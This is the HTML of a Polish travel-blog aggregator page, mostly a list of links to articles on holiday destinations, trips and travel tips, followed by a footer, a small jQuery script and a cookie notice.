<li><img src="/images/photo.png"><a href="/artykul/46/Pomysl,o,wakacjach,nad,polskim,morzem">Pomyśl o wakacjach nad polskim morzem!</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/polskie-morze.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/45/Szukasz,miejsca,na,wypoczynek,Odwiedz,nasze,polskie,morze">Szukasz miejsca na wypoczynek? Odwiedź nasze polskie morze!</a><p class="clear"></p></li>
<li><img src="/images/photo.png"><a href="/artykul/44/Jak,wybrac,biuro,podrozy,na,wakacje">Jak wybrać biuro podróży na wakacje?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/ursynow.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/43/Warszawski,Ursynow">Warszawski Ursynów</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/amsterdam.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/42/Rowerem,przez,Holandie">Rowerem przez Holandię</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/Dzienniki-japonskie.jpeg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/41/Recenzja,ksiazki,Piotra,Milewskiego,Dzienniki,japonskie">Recenzja książki Piotra Milewskiego pt. Dzienniki japońskie. Zapiski z roku Królika i roku Konia</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/pieczatka.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/40/Kontrowersje,na,granicy,pieczatki,w,paszportach">Kontrowersje na granicy – pieczątki w paszportach</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/sloneczny-brzeg-bulgaria.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/39/Sloneczny,Brzeg,rajskie,piaski,Bulgarii">Słoneczny Brzeg - rajskie piaski Bułgarii</a><p class="clear"></p></li>
<li><img src="/images/photo.png"><a href="/artykul/38/Mapa,Toskanii,jakie,atrakcje,warto,zwiedzic,w,tym,regionie">Mapa Toskanii – jakie atrakcje warto zwiedzić w tym regionie?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/urlop.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/37/Zaplanuj,urlop,idealny">Zaplanuj urlop idealny</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/praga.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/36/Jedziemy,do,Czech">Jedziemy do Czech</a><p class="clear"></p></li>
<li><img src="/images/photo.png"><a href="/artykul/35/Last,minute,czyli,oferta,dla,ludzi,z,refleksem">Last minute czyli oferta dla ludzi z refleksem</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/34stambul.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/34/5,miast,do,ktorych,warto,wybrac,sie,na,zakupy">5 miast do których warto wybrać się na zakupy</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/dunajec.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/33/Splyw,Dunajcem,przezyj,zapierajaca,dech,w,piersiach,przygode">Spływ Dunajcem – przeżyj zapierającą dech w piersiach przygodę!</a><p class="clear"></p></li>
<li><img src="/images/photo.png"><a href="/artykul/32/Dlaczego,warto,odwiedzic,Duszniki,Zdroj">Dlaczego warto odwiedzić Duszniki Zdrój?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/szwajcaria.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/31/Franki,zegarki,i,czekolada,3,symbole,Szwajcarii">Franki, zegarki i czekolada – 3 symbole Szwajcarii</a><p class="clear"></p></li>
<li><img src="/images/photo.png"><a href="/artykul/30/Lacznosc,w,sytuacjach,kryzysowych,radiotelefon">Łączność w sytuacjach kryzysowych - radiotelefon</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/poznan.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/29/Poznan,na,weekend">Poznań na weekend</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/Szczecin.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/28/Jaki,piekny,jest,Szczecin">Jaki piękny jest Szczecin!</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/mojeloty.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/27/Podroz,poslubna,do,raju">Podróż poślubna do raju</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/skoki.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/26/Skok,ze,spadochronem,Teraz,twoja,kolej">Skok ze spadochronem? Teraz twoja kolej!</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/idea-bank.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/25/Czy,kazda,firma,uzyska,kredyt,na,dowolny,cel">Czy każda firma uzyska kredyt na dowolny cel?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/chorwacja2.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/24/Kierunek,wakacje">Kierunek wakacje</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/tatry.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/23/Tatrzanskie,Koscielisko,piekno,w,pelnej,krasie">Tatrzańskie Kościelisko – piękno w pełnej krasie</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/agadir.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/22/Agadir,czyli,glowne,miejsce,na,wakacje,w,Maroku">Agadir, czyli główne miejsce na wakacje w Maroku</a><p class="clear"></p></li>
<li><img src="/images/photo.png"><a href="/artykul/21/Ubezpieczenie,OC,w,podrozy">Ubezpieczenie OC w podróży</a><p class="clear"></p></li>
<li><img src="/images/photo.png"><a href="/artykul/20/Polacy,w,Chorwacji,jak,wypoczywamy,w,tym,kraju">Polacy w Chorwacji: jak wypoczywamy w tym kraju?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/ciekawe_pomysły_na_sylwestra.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/19/Ciekawe,pomysly,na,sylwestra,czy,wiesz,juz,co,bedziesz,robic,w,tym,roku">Ciekawe pomysły na sylwestra – czy wiesz już co będziesz robić w tym roku?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/jesien.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/18/Wygodne,obuwie,to,podstawa,jakie,buty,sprawdza,sie,jesienia">Wygodne obuwie to podstawa – jakie buty sprawdzą się jesienią?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/chorwacja.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/17/Chorwackie,wyspy,po,sezonie,gdzie,warto,sie,wybrac">Chorwackie wyspy po sezonie: gdzie warto się wybrać?</a><p class="clear"></p></li>
<li><img src="/images/photo.png"><a href="/artykul/16/Wycieczka,szkolna,najlepsze,wspomnienie,szkolnych,lat">Wycieczka szkolna – najlepsze wspomnienie szkolnych lat</a><p class="clear"></p></li>
<li><img src="/images/photo.png"><a href="/artykul/15/Wypoczynek,w,zaglach">Wypoczynek w żaglach</a><p class="clear"></p></li>
<li><img src="/images/photo.png"><a href="/artykul/14/Podroz,w,poszukiwaniu,sportow,i,widowisk,ekstremalnych">Podróż w poszukiwaniu sportów i widowisk ekstremalnych</a><p class="clear"></p></li>
<li><img src="/images/photo.png"><a href="/artykul/13/Chwila,relaksu,w,Warszawie">Chwila relaksu w Warszawie</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/trentino.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/12/Letnie,atrakcje,we,wloskim,regionie,Trentino">Letnie atrakcje we włoskim regionie Trentino</a><p class="clear"></p></li>
<li><img src="/images/photo.png"><a href="/artykul/11/Wloskie,wakacje,o,czym,warto,wiedziec">Włoskie wakacje – o czym warto wiedzieć?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/140508_banner_airbnb_843x433_v315.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/10/Oryginalna,potrawa,podczas,podrozy">Oryginalna potrawa podczas podróży</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/turcja.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/9/Urlop,w,Stambule,czyli,poznajemy,Turcje,na,nowo">Urlop w Stambule, czyli poznajemy Turcję na nowo</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/austria.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/8/Najlepsze,rejony,narciarskie,w,Austrii">Najlepsze rejony narciarskie w Austrii</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/bangkok.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/7/Tym,zaskoczy,turystow,Bangkok">Tym zaskoczy turystów Bangkok!</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/caribbean.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/6/Wakacje,na,morzu,dlaczego,warto">Wakacje na morzu – dlaczego warto?</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/ski.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/5/Bormio,niezwykly,kurort">Bormio: niezwykły kurort</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/kanaryjskie.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/4/Aktywne,wczasy,na,Wyspach,Kanaryjskich">Aktywne wczasy na Wyspach Kanaryjskich</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/nil.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/3/Aktywne,oblicze,egipskich,perelek">Aktywne oblicze egipskich perełek</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/dolomity.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/2/Narciarski,urlop,w,sercu,Dolomitow">Narciarski urlop w sercu Dolomitów</a><p class="clear"></p></li>
<li><img src="/phpThumb/phpThumb.php?src=/userfiles/image/1360323_14881862.jpg&amp;w=100&amp;h=100&amp;zc=2"><a href="/artykul/1/Irlandia,skarby,Zielonej,Wyspy">Irlandia: skarby Zielonej Wyspy</a><p class="clear"></p></li>
</ul> 

</div>


<p class="clear"></p>
</div>

<div id="footer">
	
	


	<p>
	Zdjęcia oraz treści wpisów pochodzą bezpośrednio od autorów blogów, a źródła podane są poniżej każdego wpisu.<br>Jeżeli nie chcesz, aby Twój blog znajdował się na liście subskrybowanych przez TravelReporter.pl - <a href="/kontakt">napisz</a> - bez zwłoki usuniemy wszystkie wpisy z naszych zasobów.<br><a href="/do-pobrania">logo i materiały do pobrania</a> | Copyrights © crazybeaver.net 2013-2018 &nbsp; &nbsp;
	</p>
	
<p class="clear"></p>
	
</div>



</div><script type="text/javascript" async="" src="//ustat.info/60472988.f4ahld863trtwdnpexyjxyt8n541bw"></script>
<script>
	$(document).ready(
	
	function() {
		$('.data').each(function(){ $(this).click(function() { var v = $(this).find('.title a').attr('href'); window.location.href=v; }); });
		$('.corner').corner('6px');
		$('.photo').each(function() { $(this).mouseenter(function() { $(this).find('.data').fadeIn(); $(this).find('.mainlink').fadeOut(); }); $(this).mouseleave(function() { $(this).find('.data').fadeOut(); $(this).find('.mainlink').fadeIn(); }); });
	}
	
	);

</script>


	

<div style="position:fixed; height:40px; bottom:0; width:100%; background:#DFDFDF; color:#444444; font-size:9pt; font-family:Tahoma;padding:15px; text-align:center;">Ta strona używa cookies i podobnych technologii m.in. w celach: świadczenia usług, reklamy, gromadzenia statystyk. Korzystanie ze strony bez zmiany ustawień<br> Twojej przeglądarki oznacza, że cookies są umieszczane w Twoim urządzeniu końcowym. Pamiętaj, że zawsze możesz zmienić te ustawienia w Twojej przeglądarce. <a href="#" onclick="$(this).parent().hide();">[akceptuję]</a></div><iframe id="google_osd_static_frame_9558864913553" name="google_osd_static_frame" style="display: none; width: 0px; height: 0px;"></iframe></body><iframe id="google_shimpl" style="display: none;"></iframe></html>